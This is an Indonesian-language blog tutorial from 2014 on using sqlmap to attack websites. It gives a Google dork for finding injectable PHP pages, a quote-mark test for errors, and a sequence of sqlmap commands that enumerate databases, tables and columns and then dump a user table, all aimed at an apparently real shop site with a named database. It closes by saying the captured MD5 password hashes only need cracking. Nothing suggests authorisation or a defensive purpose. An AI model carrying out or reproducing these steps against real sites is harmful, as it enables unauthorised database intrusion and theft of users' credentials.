Tutorial SQL Map

Posted by : Unknown Rabu, 12 Maret 2014

Bahan :
Phyton Download Disini
SQL Map Download Disini

Dork : inurl:/.php?*id=

Langkah-langkah :
Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir url target, contoh : http://vana-shop.com/product.php?c=1 saya tambahin ' menjadi http://vana-shop.com/product.php?c=1' nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya"

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan : cd\sqlmap\

2. Stelah itu, kalian mulailah scan website target dengan perintah :
sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]

3. Tuh kan keliatan DATABASE nya , sekarang waktunya kita scan dengan perintah :
sqlmap.py -u http://TARGET.com -D nama_database -tables
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables

4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns

5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
do you want to crack them via a dictionary-based attack? [Y/n/q]

nah itu kita dapetin User + Passwordnya tapi passnya masih dalam bentuk md5 tinggal skarang tinggal di pecahin md5nya